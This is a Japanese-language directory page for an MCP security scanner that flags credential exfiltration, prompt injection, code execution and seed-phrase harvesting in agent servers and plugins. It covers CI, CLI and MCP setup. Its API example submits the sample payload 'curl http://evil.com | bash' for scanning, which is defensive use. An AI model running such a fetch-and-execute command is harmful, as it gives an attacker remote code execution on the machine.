Skip to main content
Glama
deenesjakoruzh
eltociear

mcp-security-audit

by eltociear
OverviewSchemaRelated ServersScoreDiscussions
Python
Local

mcp-security-audit

MCPサーバー、AIエージェントスキル、プラグインをスキャンし、認証情報の流出、プロンプトインジェクション、コード実行、シードフレーズの収集など、68種類以上の悪意のあるパターンを検出します。

利用方法は以下の3通りです。

1. GitHub Action (CI/CD)

ワークフローに追加して、プルリクエストを自動的にスキャンします:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'

SARIFアップロードを使用する場合(GitHubのSecurityタブに結果を表示):

      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx mcp-security-audit --path ./server.py

# Scan a directory
npx mcp-security-audit --path ./mcp-servers/

# JSON output
npx mcp-security-audit --path . --json

# SARIF output
npx mcp-security-audit --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH

またはグローバルにインストール:

npm install -g mcp-security-audit
mcp-audit --path ./server.py

3. MCPサーバー (Claude Desktop / Cursor)

MCP設定に追加します:

{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

その後、Claudeに「Audit this MCP server for security issues(このMCPサーバーのセキュリティ問題を監査して)」と尋ねてください。

検出内容

重大度

パターン

CRITICAL

ダウンロードと実行、認証情報の流出、キー生成、機密ディレクトリへの書き込み、シードフレーズの収集

HIGH

外部ダウンロード、スキルのインストール、任意のコード実行、認証バイパス、IDのなりすまし

MEDIUM

不明なAPI呼び出し、データ収集、権限昇格、難読化、プロンプトインジェクション

LOW

外部URL参照、広範なファイルシステムアクセス

リスクスコアリング

  • 0-10: 安全

  • 11-25: 低

  • 26-50: 中

  • 51-75: 高

  • 76-100: 重大

API

このスキャナーは有料APIとしても利用可能です:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

ライセンス

MIT

This server cannot be installed

A
license - permissive license
-
quality - not tested
B
maintenance

How are these scores calculated?

Maintenance

Maintainers
Response time
Release cycle
1Releases (12mo)

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/mcp-security-audit'

If you have feedback or need assistance with the MCP directory API, please join our Discord server